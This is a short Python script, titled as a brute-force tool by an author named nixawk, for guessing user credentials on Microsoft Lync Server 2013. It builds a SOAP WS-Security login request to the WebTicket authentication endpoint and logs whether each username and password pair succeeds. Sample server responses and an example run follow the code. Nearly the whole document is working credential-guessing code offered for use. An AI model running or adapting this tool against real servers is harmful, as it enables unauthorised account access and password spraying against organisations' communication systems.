[bruteforce] Microsoft lync server 2013

[nixawk]

#!/usr/bin/python
# -*- coding: utf-8 -*-

# Purpose: Bruteforce Lync User.
# Product: Microoft lync server 2013
# Author : Nixawk

import requests
import base64
import logging


logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)


def lync_login(indexURI, username, password):
    boolret = False

    sapi = "%s/WebTicket/WebTicketService.svc/Auth" % indexURI

    data = ''
    data += '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
    data += '<s:Header>'
    data += '<Security s:mustUnderstand="1" xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">'
    data += '<UsernameToken>'
    data += '<Username>%s</Username>' % base64.b64encode(username)
    data += '<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText">%s</Password>' % base64.b64encode(password)
    data += '</UsernameToken>'
    data += '</Security>'
    data += '</s:Header>'
    data += '<s:Body>'
    data += '<RequestSecurityToken xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" Context="50f2ef42-a03a-fa41-fe45-b032979f3642" xmlns="http://docs.oasis-open.org/ws-sx/ws-trust/200512">'
    data += '<TokenType>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1</TokenType>'
    data += '<RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</RequestType><AppliesTo xmlns="http://schemas.xmlsoap.org/ws/2004/09/policy">'
    data += '<EndpointReference xmlns="http://www.w3.org/2005/08/addressing">'
    data += '<Address>%s/WebTicket/WebTicketService.svc/Auth</Address>' % indexURI
    data += '</EndpointReference>'
    data += '</AppliesTo>'
    data += '<Lifetime>'
    data += '<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T08:00:28Z</Created>'
    data += '<Expires xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T08:31:28Z</Expires>'
    data += '</Lifetime>'
    data += '<KeyType>http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey</KeyType>'
    data += '</RequestSecurityToken>'
    data += '</s:Body>'
    data += '</s:Envelope>'

    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "text/xml",
        "SOAPAction": "http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue",
        "Referer": "%s/Dialin/Conference.aspx" % indexURI,
    }

    try:
        sess = requests.Session()
        response = sess.post(sapi, headers=headers, data=data)

        if response is None:
            log.info("%s/%s - login failed." % (username, password))
            return boolret

        if response.status_code == 200 and "<RequestedSecurityToken>" in response.text:
            log.info("%s/%s - login successfully !" % (username, password))
            boolret = True

        log.info("%s/%s - login status: %s", username, password, response.status_code)
    except Exception as err:
        log.exception(str(err))

    return boolret


# Error Response:
# <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">a:InvalidSecurityToken</faultcode><faultstring xml:lang="zh-CN">No valid security token.</faultstring><detail><OCSDiagnosticsFault xmlns="urn:component:Microsoft.Rtc.WebAuthentication.2010" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><Ms-Diagnostics-Fault><ErrorId>28020</ErrorId><Reason>No valid security token.</Reason></Ms-Diagnostics-Fault><NameValuePairs xmlns:a="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/></OCSDiagnosticsFault></detail></s:Fault></s:Body></s:Envelope>

# Succe Response:
# <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><RequestSecurityTokenResponseCollection xmlns="http://docs.oasis-open.org/ws-sx/ws-trust/200512" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><RequestSecurityTokenResponse Context="50f2ef42-a03a-fa41-fe45-b032979f3642"><TokenType>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1</TokenType><RequestedSecurityToken><UserToken xmlns="urn:component:Microsoft.Rtc.WebAuthentication.2010">cwt=AAEBHAEFAAAAAAAFFQAAADZZRLr9wt7biZjFdLjiAACBED....eA5TnN-9Gz7aSPI</UserToken></RequestedSecurityToken><AppliesTo xmlns="http://schemas.xmlsoap.org/ws/2004/09/policy"><EndpointReference xmlns="http://www.w3.org/2005/08/addressing"><Address>https://lyncpool.example.com/</Address></EndpointReference></AppliesTo><Lifetime><Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T09:04:22.5149452Z</Created><Expires xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T09:22:28.5149452Z</Expires></Lifetime><KeySize>0</KeySize></RequestSecurityTokenResponse></RequestSecurityTokenResponseCollection></s:Body></s:Envelope>

if __name__ == '__main__':
    import sys

    if len(sys.argv) != 4:
        print("[*] python %s <lync URI> <[email protected]> <password>" % sys.argv[0])
        sys.exit(0)

    # indexURI = "https://lyncpool.example.com"
    indexURI = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]

    lync_login(indexURI, username, password)


## References
# https://msdn.microsoft.com/en-us/skype/ucwa/ucwaresources
# https://ucwa.skype.com/documentation/keytasks-createapplication
# https://msdn.microsoft.com/en-us/skype/ucwa/authenticationinucwa

$  python2.7 bruteforce_lync_server2013.py https://lyncpool.example.com "[email protected]/" "password"
INFO:__main__:[email protected]/password - login successfully !
INFO:__main__:[email protected]/password - login status: 200